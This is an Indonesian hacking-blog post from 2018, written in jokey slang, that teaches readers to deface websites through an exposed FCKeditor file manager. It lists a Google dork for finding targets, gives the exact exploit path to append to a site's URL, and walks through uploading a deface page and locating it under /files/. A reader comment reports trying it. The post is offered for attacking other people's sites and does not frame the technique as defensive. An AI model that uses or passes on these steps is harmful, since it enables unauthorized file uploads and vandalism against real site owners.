Wednesday, 11 April 2018

Deface FcKeditor

Idiot BlackHat Wednesday, April 11, 2018 1 Comment
Author : Anonimokerl

Hae kimak!1!1 Balik lagi dengan mimin yang tamvan!1!1!1 Kali ini mimin akan share tutor deface poc Fckeditor. Langsung saja mak!1!1!1

1. Bahan-bahan :

  1. Internet
  2. Hp/PC
  3. Script deface

2. Dork :

  • inurl:advert_detail.php?id=

3. Exploit :

  • /admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
4. Langkah-langkah :
  • Pertama, kyta dorking dulu mak!1!1!1!1
  • Kedua, pilih salah satu web.
  • Ketiga, masukan exploitya dibelakang site.
Contoh :
  • Https://nimogans.tq/ 
Lalu kyta masukan exploitnya, menjadi :
  • Https://nimogans.tq/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
Kalo vuln maka akan seperti ini (cek gambar dibawah).


  • Keempat, upload sadja scriptnya :V 
Letak filemu? filenya berada di web/files/namasc.html
contoh:
Https://nimogas.tq/files/nimo.html
  • Dan taraaaaa!1!1!1 Kalian dah bisa :* unchhh
5. Live target :

Note : Untuk live target masukan dulu exploitya!1!1

Sekian dulu mak!1!1 Kalo ada yang mau ditanyakan comment sadja :* 
mmmppppssshhhhhh
Tags:
Previous Post
Next Post
Idiot BlackHat

1 comment:

  1. Unknown2 December 2018 at 22:04

    udh ada tulisan "file uploaded with no error" kok mau liat hasilnya ngga jadi gan

    ReplyDelete